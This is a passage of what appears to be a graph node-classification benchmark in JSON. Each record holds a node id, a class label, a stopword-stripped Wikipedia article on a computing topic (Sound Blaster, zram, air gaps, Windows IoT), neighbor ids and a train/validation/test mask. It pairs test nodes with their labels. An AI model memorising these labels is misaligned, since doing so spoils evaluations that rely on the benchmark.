16 ohms 300 ohms sound blasterx g1 sb-axx1 audio chip able save profiles blasterx acoustic engine device able save profiles x-plus configurator running x-plus mode x-plus configurator software available windows pc profiles x-plus configurator apply equalizer settings tuned certain games sound blasterx g1 support u hear sound blaster cards since 1999 conform microsoft pc 99 standard color-coding external connectors follows awe line 1994 creative cards short text inscriptions backplane card indicating port i.e mic spk aux aux later cards text inscriptions changed icons latest cards creative cards changed use numbers ports flexi-jacks different functions assigned run-time i.e changed speaker output mic color overlay sticker included retail units help consumers identify commonly used functions ports default modes lot audio/data pin connectors jumpers-setting present internal body sound blaster different card card along years productions common pin connector common pin jumper setting especially plug-and-play features drivers audigy 2 zs soft-modded enthusiasts installed creative older cards including sound blaster live audigy audigy 2 claimed offer improved sound quality hardware acceleration higher eax versions games 64-channel mixing audigy 1 overall improvement card performance several forum posts across web reported favorable results technique excepting live users drivers add ability use newer software applications i.e newer mixer applet comments forums developers software mod said live hardware capable eax3 64-channels hardware sound mixing later 2004 creative released updated drivers top-to-bottom audigy audigy 4 line put cards basically feature parity software level 2006 entire audigy lineup uses driver package dsp decoding driver level cards audigy 2 zs 4 still supported official drivers works soft-modded drivers cards hardware dsp like audigy 2 6.1 windows vista released single beta driver creative audigy series usable operating system minimal functionality frequent instability reported users creative forum activist named daniel k. modified drivers x-fi applied audigy live series restoring features came original xp setup cd vista x-fi drivers noticeably better sound quality vista bug fixes newer build last modified version 2.15.0004eq april managed enable x-fi crystallizer work audigy series cards software however patents involved forced remove modified drivers dll patch creative released newer official audigy vista driver 2.18.0000 28 july 2008 due public consumer pressure however form agreement creative daniel k achieved returned creative forums posting updated versions modified drivers released final version modded driver package january 12 2012 recent linux distributions support sound blaster cards via kernel drivers case non-plug-and-play isa cards configuration file /etc/modules must reconfigured writing example sound blaster 16 card installed snd-sb16 isapnp=0 x-fi series cards basic support linux however advanced features like signal routing relay control external i/o consoles supported support newer sound blaster cards z ae series added kernel 4.19-4.20 release timeframe",
    "neighbors": [
      5377,
      10369,
      10371,
      6150,
      6797,
      8080,
      5009,
      5265,
      9363,
      10360,
      4641,
      683,
      10363,
      2861,
      9525,
      6971,
      2368,
      5702,
      9799,
      6730,
      4047,
      4699,
      10076,
      1501,
      6510,
      6129,
      8945,
      10359,
      5368,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 8562,
    "label": 0,
    "text": "Johanna_Moore:johanna moore johanna doris moore computational linguist cognitive scientist research publications include contributions natural language generation spoken dialogue systems computational models discourse intelligent tutoring training systems human-computer interaction user modeling knowledge representation received b.s mathematics computer science summa cum laude 1980 m.s computer science 1982 ph.d advisors william swartout gerald estrin 1989 ucla moore held posts ucla 1976–1986 usc information sciences institute 1983–1989 university pittsburgh 1990–1998 since 1998 held chair artificial intelligence within school informatics university edinburgh served director human communication research centre co-director institute language cognition computation 2014-2018 head school informatics succeeded role professor jane hillston moore elected ucla chapter phi beta kappa 1980 held office naval research fellowship 1982 1985 ibm fellow 1985 1987 held national science foundation national young investigator award 1994 1999 chair cognitive science society president association computational linguistics 2004 fellow british computer society 2003 elected fellow royal society edinburgh moore carrying research project june 2015 may 2016 connected digital economy",
    "neighbors": [
      1890,
      2440,
      7724,
      4916,
      1783
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8563,
    "label": 4,
    "text": "Japan_Vulnerability_Notes:japan vulnerability notes japan vulnerability notes jvn japan national vulnerability database maintained japan computer emergency response team coordination center japanese government information-technology promotion agency",
    "neighbors": [
      2558,
      2446
    ],
    "mask": "Train"
  },
  {
    "node_id": 8564,
    "label": 4,
    "text": "Special_Communications_Service_of_Russia:special communications service russia special communications information service federal protective service russian federation spetssvyaz spetssviaz cryptologic intelligence agency federal protective service russia responsible collection analysis foreign communications foreign signals intelligence well protecting russian government communications information systems involves information security cryptanalysis/cryptography service established march 11 2003 successor fapsi created 8th main directorate government communications 16th directorate electronic intelligence kgb september 25 1991 following august coup soviet president mikhail gorbachev dismantled kgb several independent departments one became committee government communications president soviet union december 24 1991 disbanding soviet union organization became federal agency government communications information president russian federation march 11 2003 agency reorganized service special communications information spetssviaz federal security service fsb august 7 2004 spetssviaz incorporated structural sub unit federal protective service fso service created result reform march 11 2003 basis federal agency government communications information fapsi initially special communication service fso according direction regulations service special communications information federal service russian federation service special communication information special communication russia federal special communication information exercising powers within organization provision service security development improving governmental systems kinds special links information gathering federal government agencies public authorities russian federation state bodies august 7 2004 vladimir putin signed decree federal service russian federation according decree service become part fso 16th centre “ military unit 71330 ” inherited fapsi fsb ’ main structural unit signals intelligence consists central unit housed unmarked administrative buildings many different locations across moscow secluded forest enclosures satellite dishes several metres diameter facing different directions located mainly along russia ’ borders signals intelligence facilities also referred information reception centres direct reference main function 16th centre ’ signals intelligence facilities closest estonia krasnoye selo lenin-grad oblast verbnoye kaliningrad oblast neyolovo pskov oblast last one 25 kilometres estonian border 2003 2010 spetssviaz director yuri korneev director special communications service deputy director russian federal protective service",
    "neighbors": [
      6344,
      4937,
      7887,
      1169,
      11089,
      4595,
      1941,
      7893,
      10935,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8565,
    "label": 0,
    "text": "Coh-Metrix:coh-metrix coh-metrix computational tool produces indices linguistic discourse representations text developed arthur c. graesser danielle mcnamara coh-metrix calculates coherence texts many different measures coh-metrix used many different ways investigate cohesion explicit text coherence mental representation text definition cohesion consists characteristics explicit text play role helping reader mentally connect ideas text graesser mcnamara louwerse 2003 definition coherence subject much debate theoretically coherence text defined interaction linguistic representations knowledge representations coherence defined characteristics text i.e. aspects cohesion likely contribute coherence mental representation coh-metrix measurements provide indices cohesion characteristics according empirical study coh-metrix l2 reading index performs significantly better traditional readability formulas",
    "neighbors": [
      1890,
      2562
    ],
    "mask": "Test"
  },
  {
    "node_id": 8566,
    "label": 7,
    "text": "SmartBear_Software:smartbear software smartbear software privately-held information technology company delivers tools application performance monitoring apm software development software testing api management company based assembly square somerville greater boston area current smartbear company founded 2009 original smart bear company founded jason cohen 2003 current smartbear software result insight venture partners acquiring three companies smart bear automatedqa pragmatic software 2007 early 2009 companies operated aqa holdings rebranded smartbear software 2010 rebranding company acquired eviware 2011 leading api promoter soapui founder ole lensmar joining company later served chief technology officer cto smartbear year company acquired apm vendor alertsite 2013 smartbear acquired spanish apm vendor lucierna smartbear acquired open source community swagger 2015 founder tony tam joined company head products swagger commercial version swagger swaggerhub 2016 smartbear acquired crossbrowsertesting.com cbt ken hamric founder cbt joined company general manager crossbrowsertesting.com 2017 francisco partners acquired majority stake smartbear software smartbear based greater boston area u.s. offices texas tennessee florida smartbear also offices development centers ireland sweden smartbear current ceo justin teague smartbear software offers 16 commercial products following categories api readiness software testing monitoring code collaboration code optimization two open-source tools soapui swagger api readiness smartbear products include soapui pro api functional testing secure pro api security testing loadui pro api load testing swaggerhub swagger-based api editor smartbear software testing tools include testcomplete automated testing loadcomplete load testing testleft functional testing crossbrowsertesting cloud testing platform monitoring alertsite smartbear application quality performance monitoring tool code collaboration code optimization smartbear offers collaborator code review document review tool aqtime pro performance profiling",
    "neighbors": [
      1657,
      170,
      6507,
      1740
    ],
    "mask": "None"
  },
  {
    "node_id": 8567,
    "label": 4,
    "text": "Global_Telecoms_Exploitation:global telecoms exploitation global telecoms exploitation reportedly secret british telephonic mass surveillance programme run british signals intelligence computer security agency government communications headquarters gchq existence revealed along sister programme mastering internet june 2013 part global surveillance disclosures former national security agency contractor edward snowden",
    "neighbors": [
      3495,
      7887,
      1169,
      4595,
      7893,
      8156,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 8568,
    "label": 4,
    "text": "Cyveillance:cyveillance 2015 cyveillance acquired lookingglass cyber solutions following information date december 2015 cyveillance company involved cyber intelligence industry cyveillance uses proprietary technology platform human analysts identify risks early prevention mitigation cyveillance founded 1997 based reston virginia united states company ’ subscription-based product cyveillance intelligence center hosted solution companies hire cyveillance monitor internet risks information leaks phishing malware attacks online fraud schemes sale stolen credit debit card numbers threats executives events counterfeiting trademark brand abuse united states secret service contracts cyveillance search available information related secret service missions information obtained cyveillance incorporated protective research information management system prism surveillance program existing secret service system cyveillance bought may 2009 uk firm qinetiq initial cash consideration 40 million current management also entitled additional 40 million anniversary closing dependent hitting certain performance numbers cyveillance clients include firms financial services energy technology retail pharmaceutical industries cyveillance provides open source internet intelligence 400 clients including half fortune 100 cyveillance founded 1997 brandy thomas christopher young mark bildner jason thomas originally called online monitoring services renamed 1998 cyveillance 1997 2009 cyveillance privately held qinetiq north america provider information technology engineering solutions u.s. government acquired cyveillance may 2009 2013 qinetiq north america expanded cyveillance management team appointment technical marketing executives qinetiq senior management cyveillance management team numerous websites complained cyveillance traffic following reasons 2 july 2014 cyveillance sent dmca takedown notice github behalf qualcomm caused 116 files repositories blocked github blocked repositories owned cyanogenmod sony mobile even one qualcomms repositories leading speculation notices automatically generated poorly checked 5 july 2014 qualcomm retracted takedown notices apologized reviewing files",
    "neighbors": [
      865,
      9863,
      6344,
      6797,
      113,
      11221
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8569,
    "label": 7,
    "text": "Melomics109:melomics109 melomics109 computer cluster three cabinets customized front panels located universidad de málaga part spanish supercomputing network designed increase computational power provided iamus powered melomics technology composing module melomics109 able create synthesize music variety musical styles music made freely accessible everyone 0music first album composed interpreted melomics109 launched july 21 name melomics aims freely distributing melomics109 production formats album first one released audio mp3 editable format midi cc0 public domain licensing rest melomics109 production browsed listened downloaded free melomics",
    "neighbors": [
      7983,
      3647,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8570,
    "label": 3,
    "text": "Butasan:butasan player controls pig aim game blow pigs throwing bombs bombs randomly spawned across map picked thrown pigs bombs given number 5 30 bomb thrown takes number seconds explode bombs directly hit pigs explode contact various power ups available throughout game gas makes characters fall asleep bonus sub-game involves random pigs popping holes player must knock back hole pig similar mode gameplay whack-a-mole game released various home computer systems zx spectrum commodore 64 msx amstrad cpc u.s. gold psycho pigs u.x.b several criticisms sexism advert game showing semi-naked model holding video game case published specialized magazines",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 8571,
    "label": 7,
    "text": "Kaavo:kaavo kaavo cloud computing management company kaavo founded november 2007 u.s. kaavo pioneered top-down application-centric management cloud infrastructure across public private hybrid clouds traditional infrastructure associated management intrinsically ties applications servers servers ip addresses ip addresses switches routers tightly coupled model according experts leaves little room address dynamic nature virtual infrastructure often seen cloud computing models subject matter experts supporting kaavo approach claims cloud applications decoupled servers deployed network infrastructure supports delivers effectively managed unless recognized individual components infrastructure-as-a-service iaas delivers on-demand infrastructure resources however users still need deploy configure applications workloads iaas layer kaavo provides framework automate deployment run-time management production support applications workloads multiple clouds infrastructure-as-a-service layer kaavo claims bottom-up approach traditional data center management tools makes harder manage infrastructure especially dealing scale distributed nature cloud kaavo takes top-down application-centric approach deploying managing applications cloud application-centric cloud management approach systems specific applications managed rather managing servers routers required resources given application managed unified system information deploying managing runtime services levels resources required given application captured top-down single system definition contrast infrastructure-centric bottom-up approach resources servers storage network resources managed individually one key innovations kaavo ability capture deployment run-time management behavior complex application workload single xml document kaavo system definition kaavo published xsd system definition file kaavo imod product uses patented technology based kaavo top-down application-centric management philosophy kaavo uses technology deliver two cloud management products delivered web based product hosted amazon ec2 integrated following public cloud providers amazon ec2 ibm smartcloud logicworks infinicloud rackspace cloud terremark cloud integrated following private cloud platforms cloud.com cloudstack eucalyptus ibm smartcloud openstack vmware vcloud director imod supports multiple cloud providers platforms across application workload service deployments well within single deployment imod also include on-premises physical resources within deployments onsite deployment available enterprise customers within private clouds supports imod saas capabilities api configuring managing applications supported cloud providers platforms kaavo web services use document/literal wrapped style soap compared server-level api provided iaas cloud providers platforms provides higher level abstraction managing systems configuring software web services api allows users deploy applications/workloads across public private hybrid clouds single web services call also provides interface trigger complex workflows response deployment-specific events following registered trademarks kaavo",
    "neighbors": [
      8592,
      6153,
      4194,
      10893
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8572,
    "label": 4,
    "text": "GoBack:goback norton goback previously wildfile goback adaptec goback roxio goback disk utility microsoft windows record 8 gb disk changes filesystem idle seconds marks safe points product allows disk drive restored point within available history also allows older versions files restored previous versions whole disk browsed depending disk activity typical history might cover hours days goback replaces master boot record also replaces partition table single partition allows hard drive changed back even event operating system unable boot also protecting filesystem alteration revert information remains correct goback compatible hardware raid drives due changes made partition table cause problems dual booting operating systems hard disk possible retain dual-boot compatibility involve saving partition table enabling goback enabling goback re-writing partition table back disk booting different device live cd may also necessary disable goback prior using certain low level disk utilities formatting software low level utilities first check presence goback combination goback cause data become corrupted another example incompatible program windows version true image windows goback also incompatible products drive vaccine pc restore rollback rx products require access master boot record",
    "neighbors": [
      5512,
      6797,
      2193,
      7955,
      10903,
      6297,
      925,
      5924,
      1708,
      7983,
      8368,
      2870,
      2744,
      11065,
      11256,
      2107,
      3520,
      2378,
      8398,
      7380,
      9569,
      6643,
      10872,
      1150,
      9983
    ],
    "mask": "None"
  },
  {
    "node_id": 8573,
    "label": 2,
    "text": "Zram:zram zram formerly called compcache linux kernel module creating compressed block device ram i.e ram disk on-the-fly disk compression block device created zram used swap general-purpose ram disk two common uses zram storage temporary files /tmp swap disk initially zram latter function hence original name compcache compressed cache four years linux driver staging area zram introduced mainline linux kernel version 3.14 released march 30 2014 linux kernel version 3.15 onwards released june 8 2014 zram supports multiple compression streams multiple compression algorithms compression algorithms include lz4 lzo default lz4 faster compressing/decompressing compress quite efficiently lzο like system parameters compression algorithm selected via sysfs used compressed swap space zram similar zswap general-purpose ram disk rather in-kernel compressed cache swap pages however unlike zswap zram use hard disk backing store currently possible see patch config_zram_writeback i.e move less-frequently used pages disk hand zswap requires backing store zram used swap zram like zswap also allows linux make efficient use ram since operating system hold pages memory compressed swap amount ram used application memory disk cache particularly effective machines much memory 2012 ubuntu briefly considered enabling zram default computers small amounts installed ram compressed swap space zram/zswap also offers advantages low-end hardware devices embedded devices netbooks devices usually use flash-based storage limited lifespan due write amplification also use provide swap space reduction swap usage result using zram effectively reduces amount wear placed flash-based storage resulting prolonging usable life also using zram results significantly reduced i/o linux systems require swapping google chromeos uses zram default since 2013 android includes zram since version 4.4 lubuntu also started using zram version 13.10",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      541,
      4637,
      10785,
      9762,
      6180,
      5158,
      5681,
      7217,
      8242,
      9266,
      9784,
      10809,
      576,
      2625,
      4161,
      8772,
      6213,
      6730,
      8268,
      589,
      6221,
      593,
      86,
      10333,
      97,
      6244,
      5222,
      2152,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      1150,
      4734,
      11391,
      2179,
      7812,
      10883,
      4747,
      6797,
      4238,
      7821,
      10382,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      3745,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      6868,
      7382,
      8410,
      10971,
      1247,
      4831,
      1761,
      8928,
      1253,
      2278,
      233,
      7913,
      7403,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      2304,
      10499,
      5892,
      4360,
      1291,
      1804,
      4367,
      273,
      9490,
      11539,
      792,
      3871,
      10016,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      4424,
      6988,
      10063,
      5457,
      11601,
      5975,
      11095,
      10590,
      8545,
      8551,
      10091,
      5492,
      7540,
      1406,
      7039,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      5008,
      7057,
      1427,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1954,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      1456,
      11184,
      1972,
      3512,
      6075,
      6078,
      9151,
      1474,
      9667,
      8136,
      457,
      5074,
      5080,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8574,
    "label": 4,
    "text": "Air_gap_(networking):air gap networking air gap air wall air gapping network security measure employed one computers ensure secure computer network physically isolated unsecured networks public internet unsecured local area network means computer network network interfaces connected networks physical conceptual air gap analogous air gap used plumbing maintain water quality air-gapped computer network one network interfaces either wired wireless connected outside networks many computers even plugged wired network wireless network interface controller wifi connected nearby wireless networks access internet update software represents security vulnerability air-gapped computers either wireless interface controller permanently disabled physically removed move data outside world air-gapped system necessary write data physical medium thumbdrive physically move computers physical access easier control electronic network interface attacked time exterior insecure system malware infects secure system used export secure data environments networks devices rated handle different levels classified information two disconnected devices networks referred low side high side low unclassified high referring classified classified higher level also occasionally referred red classified black unclassified access policies often based bell–lapadula confidentiality model data moved low-to-high minimal security measures high-to-low requires much stringent procedures ensure protection data higher level classification concept represents nearly maximum protection one network another save turning device way transfer data outside world air-gapped system copy data removable storage medium removable disk usb flash drive physically carry storage system access easily controlled upside network generally regarded closed system terms information signals emissions security unable accessed outside world downside transferring information outside world analyzed computers secure network extraordinarily labor-intensive often involving human security analysis prospective programs data entered onto air-gapped networks possibly even human manual re-entry data following security analysis sophisticated computer viruses use cyberwarfare stuxnet agent.btz designed infect air-gapped systems exploiting security holes related handling removable media possibility using acoustic communication also demonstrated researchers researchers also demonstrated feasibility data exfiltration using fm frequency signals examples types networks systems may air gapped include many systems since added features connect public internet longer effectively air gapped including thermostats internet connections automobiles bluetooth wi-fi cellular phone connectivity limitations imposed devices used environments may include ban wireless connections secure network similar restrictions em leakage secure network use tempest faraday cage scientists 2013 demonstrated viability air gap malware designed defeat air gap isolation using acoustic signaling shortly network security researcher dragos ruiu badbios received press attention 2014 researchers introduced airhopper bifurcated attack pattern showing feasibility data exfiltration isolated computer nearby mobile phone using fm frequency signals 2015 bitwhisper covert signaling channel air-gapped computers using thermal manipulations introduced bitwhisper supports bidirectional communication requires additional dedicated peripheral hardware later 2015 researchers introduced gsmem method exfiltrating data air-gapped computers cellular frequencies transmission generated standard internal bus renders computer small cellular transmitter antenna projectsauron malware discovered 2016 demonstrates infected usb device used remotely leak data air-gapped computer malware remained undetected 5 years relied hidden partitions usb drive visible windows transport channel air-gapped computer computer connected internet presumably way share files two systems nfcdrip name given discovery stealthy data exfiltration nfc near-field communication radio abuse signal detection 2018 although nfc enables devices establish effective communication bringing within centimeters researchers showed abused transmit information much longer range expected 100 meters general malware exploit various hardware combinations leak sensitive information air-gapped systems using air-gap covert channels hardware combinations use number different mediums bridge air-gap including acoustic light seismic magnetic thermal radio-frequency",
    "neighbors": [
      5986,
      3843,
      6917,
      8998,
      7527,
      10697,
      939,
      10968,
      1970,
      10867,
      7127,
      9688,
      7739,
      2426,
      7515,
      28,
      1087,
      2111
    ],
    "mask": "None"
  },
  {
    "node_id": 8575,
    "label": 4,
    "text": "Tom_Cross_(computer_security):tom cross computer security tom cross also known decius american computer security expert hacker cross born 1976 toronto ontario canada grew tennessee father worked telecommunications policy mother registered nurse assistant attended brentwood high school brentwood tennessee attending georgia tech atlanta receiving bachelor degree computer engineering co-founded efga electronic frontiers georgia 1995 1996 co-founded computer sentry software known award-winning cyberangel software laptop anti-theft program 1999-2000 chief engineer dataway computer security firm san francisco 2000-2001 worked iasiaworks director global security engineering 2001 founded industrial memetics developed popular collaborative blogging community memestreams cross speaker several technology conferences including phreaknic summercon first international hackers conference seoul korea is2k internetworld singapore apricot asia-pacific regional internet conference operational technologies also among attendees first ever def con known extensive rant essays speeches technology policy also co-host episodes binary revolution cryptography expert",
    "neighbors": [
      11576,
      5579,
      4956,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8576,
    "label": 3,
    "text": "Windows_IoT:windows iot windows iot formerly windows embedded family operating systems microsoft designed use embedded systems microsoft currently three different subfamilies operating systems embedded devices targeting wide market ranging small-footprint real-time devices point sale pos devices like kiosks windows embedded operating systems available original equipment manufacturers oems make available end users preloaded hardware addition volume license customers cases april 2018 microsoft released azure sphere another operating system designed iot applications running linux kernel mid-1998 microsoft worked venturcom company specialized software embedded systems windows nt embedded product windows nt embedded 4.0 got start 1998 small team developers microsoft project known within microsoft impala released 1999 windows nt embedded 4.0—a set tools database approximately 250 components allowed developers put together small windows nt 4.0 run-time images embedded devices tools allowed oems embedded developers create components encapsulating binaries add seamlessly windows nt embedded runtimes containing limited functionality devices minimum run-time images small 9 mb system featuring full win32 api shortly release early 2000 microsoft decided best take architecture make new product leveraging new windows code new windows embedded team formed leadership bruce beachman served product unit manager pum first windows embedded – started recruiting engineers within microsoft team set sights next version decision made stop development windows 2000 embedded start work windows xp embedded product called whistler plans drawn team expanded work started whistler embedded codenamed mantis component count risen 250 10,000—most device-driver components feature set embedded tools enriched include things like basic version control component scripting expandability tools also added make easier start blank slab hardware deploy embedded os quickly easily august 26 2001 beta 2 windows xp embedded released full release planned later year initial team consisted target designer component designer two-parts suite first version windows embedded suite first test team manager bombo sofa lead first xpe test team starting 2000 bruce beachman leadership microsoft shipped first version windows embedded xpe devcon windows hardware conference 2001 2002 bruce beachman left microsoft peter wilson took xpe team pum team merged windows deployment team released xpe sp1 devcon las vegas late 2003 microsoft rebranded windows embedded windows iot starting release embedded versions windows 10 windows 10 iot enterprise based windows 10 enterprise cbb/ltsc/ltsb/sac updated version embedded industry embedded standard plain unlabeled retail/thin client tablet small tablet versions available differing licensing windows 10 iot mobile based windows 10 mobile successor embedded handheld windows 10 iot mobile enterprise adds arm support multiple user profiles advanced lockdown capabilities otherwise identical normal mobile version windows 10 iot core considered successor windows embedded compact although maintains little compatibility optimized smaller lower-cost industry devices also provided free charge use devices like raspberry pi hobbyist use windows 10 iot core pro provides ability defer control updates licensed via distributors otherwise identical normal iot core version windows embedded compact previously known windows embedded ce windows ce version windows embedded small computers embedded systems including consumer electronics devices like set-top boxes video game consoles windows embedded compact modular real-time operating system specialized kernel run 1 mb memory comes platform builder tool used add modules installation image create custom installation depending device used windows embedded compact available arm mips superh x86 processor architectures microsoft made available specialized version windows embedded compact known windows mobile use mobile phones customized image windows embedded compact along specialized modules use mobile phones windows mobile available four variants windows mobile classic pocket pc windows mobile standard smartphones windows mobile professional pda/pocket pc phone edition windows mobile automotive communication/entertainment/information systems used automobiles modified versions windows mobile used portable media centers 2010 windows mobile replaced windows phone 7 also based windows embedded compact compatible previous products windows embedded compact 2013 real-time operating system runs arm x86 sh derivatives architectures included .net framework ui framework various open source drivers services 'modules windows embedded standard brand windows embedded operating systems designed provide enterprises device manufacturers freedom choose capabilities part industry devices intelligent system solutions intended build atms devices healthcare manufacturing industries creating industry-specific devices brand consists windows nt 4.0 embedded windows xp embedded windows embedded standard 2009 wes09 windows embedded standard 7 windows embedded 8 standard provides full win32 api windows embedded standard 2009 includes silverlight .net framework 3.5 internet explorer 7 windows media player 11 rdp 6.1 network access protection microsoft baseline security analyzer support managed windows server update services system center configuration manager windows embedded standard 7 based windows 7 previously codenamed windows embedded 'quebec windows embedded standard 7 includes windows vista windows 7 features aero superfetch readyboost windows firewall windows defender address space layout randomization windows presentation foundation silverlight 2 windows media center among several packages available ia-32 x64 versions released 2010 larger minimum footprint ~300 mb compared 40 mb xpe also requires product activation windows embedded standard 7 released april 27 2010 windows embedded 8 standard released march 20 2013 currently divided two brands fes products binary identical versions oses available retail licensed exclusively use embedded devices available ia-32 well x64 processors windows embedded pro formerly windows embedded enterprise brand consists non server fes products including windows nt workstation windows 2000 professional windows xp professional windows vista business ultimate windows 7 professional ultimate windows 8 pro windows 8.1 pro microsoft renamed windows embedded enterprise windows embedded pro starting windows embedded 8 pro windows embedded server brand consists fes server products including server home server sql server storage server dpm server isa server uag server tmg server unified data storage server etc various years including 2000 2003 2003 r2 2004 2005 2006 2007 2008 2008 r2 2012 2012 r2 etc windows embedded industry brand windows embedded operating systems industry devices point sale systems brand limited windows embedded point service operating system released 2006 based windows xp embedded microsoft also updated version windows embedded point service named windows embedded posready 2009 however windows embedded posready 7 based windows 7 sp1 released 2011 succeeded posready 2009 microsoft since changed name product windows embedded posready windows embedded industry microsoft released windows embedded 8 industry april 2013 followed 8.1 industry october 2013 windows embedded navready also called navigation ready plug-in component windows ce 5.0 useful building portable handheld navigation devices windows embedded automotive formerly microsoft auto windows ce automotive windows automotive windows mobile automotive embedded operating system based windows ce use computer systems automobiles latest release windows embedded automotive 7 announced october 19 2010 january 10 2011 microsoft announced windows embedded handheld 6.5 operating system compatibility windows mobile 6.5 presented enterprise handheld device targeting retailers delivery companies companies rely handheld computing windows embedded handheld retains backward compatibility legacy windows mobile applications windows embedded 8.1 handheld released manufacturing april 23 2014 known simply windows embedded 8 handheld we8h prior release designed next generation windows embedded handheld line-of-business handheld devices built windows phone 8.1 also compatibility five windows embedded 8.1 handheld devices released manufactured bluebird honeywell panasonic listed",
    "neighbors": [
      516,
      11283,
      7713,
      10273,
      11301,
      5673,
      6697,
      1581,
      2605,
      5176,
      1083,
      7234,
      582,
      1098,
      8798,
      10338,
      8296,
      5225,
      8299,
      7796,
      6265,
      8315,
      636,
      1148,
      639,
      641,
      2179,
      6787,
      8326,
      8328,
      651,
      6797,
      10896,
      2196,
      9366,
      154,
      10921,
      3250,
      9910,
      10957,
      4305,
      3289,
      4316,
      9442,
      8423,
      9448,
      9964,
      10989,
      5363,
      5380,
      8976,
      3857,
      1298,
      5406,
      6441,
      7983,
      3890,
      1849,
      2361,
      6972,
      6462,
      321,
      1348,
      9033,
      2380,
      6476,
      11605,
      2391,
      11103,
      4964,
      10085,
      2919,
      8576,
      4995,
      3463,
      3978,
      6028,
      8080,
      7057,
      3477,
      4505,
      8098,
      4515,
      5027,
      3496,
      428,
      7615,
      7106,
      9166,
      4051,
      9173,
      477,
      5600,
      8675,
      4074,
      9194,
      5103,
      499,
      3573,
      10747
    ],
    "mask": "None"
  },
  {
    "node_id": 8577,
    "label": 2,
    "text": "Nokia_N82:nokia n82 nokia n82 high-end smartphone produced nokia announced 14 november 2007 part company nseries line n82 runs symbian os v9.2 s60 3rd edition fp1 n82 inherits much nokia n95 features specifications including gps wi-fi hsdpa major addition xenon flash time n82 called many best camera phone market result sometimes called n95 successor people like n95 nokia n82 critically acclaimed often considered one best symbian devices although sell much available worldwide n82 also perhaps nokia last high-end device candybar form successors opted sliders later touchscreen devices nokia n82 model leaked may 2007 along nokia n81 made official six months later november introduced month nokia n95 8gb latest firmware nokia n82 v35.0.002 released december 2009 n86 8mp 2009 slider considered n82 spiritual successor due high-end camera technology despite lack xenon flash however similar top-of-the-line device candybar form never appeared nokia n82 nokia 6220 classic 2008 second nokia xenon flash n82 includes built-in accelerometer video stabilisation photo orientation keep landscape portrait shots oriented taken automatic 270 degree screen rotation compatible n-gage gaming platform 2.4-inch tft display features 332 mhz processor found n95 n82 almost identical specifications n95 leading called n95 candybar form apart xenon camera flash addition minor technologic differences models 128 mb ram 64 mb n95 8gb variant also 128 mb cif resolution 352x288 front camera qvga 320x240 microusb port rather miniusb removal infrared port first nokia phone xenon flash n82 5-megapixel camera carl zeiss optics considered best camera phone market arrival samsung gt-i8510 discussions head head comparisons two models demonstrate n86 8mp 2009 equipped dual led flash consistently capable outperforming n82 variable lighting primary advantage using led light source video recording whereas xenon flash stronger burst light used recording videos due technical composition mainland china market version n82 different hardware platform wi-fi umts radio removed 3g support different product code rm-314 opposed rm-313 firmware incompatible regular model version readily identified lack wlan scanning display idle screen",
    "neighbors": [
      1537,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      9262,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9163,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      737,
      1377,
      1633,
      3300,
      4324,
      9443,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "Test"
  },
  {
    "node_id": 8578,
    "label": 3,
    "text": "IBM_ThinkPad_380:ibm thinkpad 380 ibm thinkpad 380 notebook computer manufactured 1997 ibm part thinkpad laptop series notable incorporating cd-rom floppy drive considered mid-range laptop ibm time sold well 380 shipped windows 95 capable running windows 3.11 windows nt os/2 warp windows 98 windows red hat linux well various linux distributions originally two models base thinkpad 380 thinkpad 380d equipped cd-rom drive 380 came intel pentium processor running 150 mhz without optional mmx feature 16 mb base ram included base hard drive 1.08 gb size windows 3.11 better operating system choice base model however 32 mb installed could run windows 95 properly models—apart base 380—could run versions windows including windows xp windows xp run smoothly however would need configured least 64 mb ram 2.0 gb hard drive larger",
    "neighbors": [
      1121,
      3304,
      3496,
      9353,
      7983,
      8976,
      3323,
      8125
    ],
    "mask": "Test"
  },
  {
    "node_id": 8579,
    "label": 3,
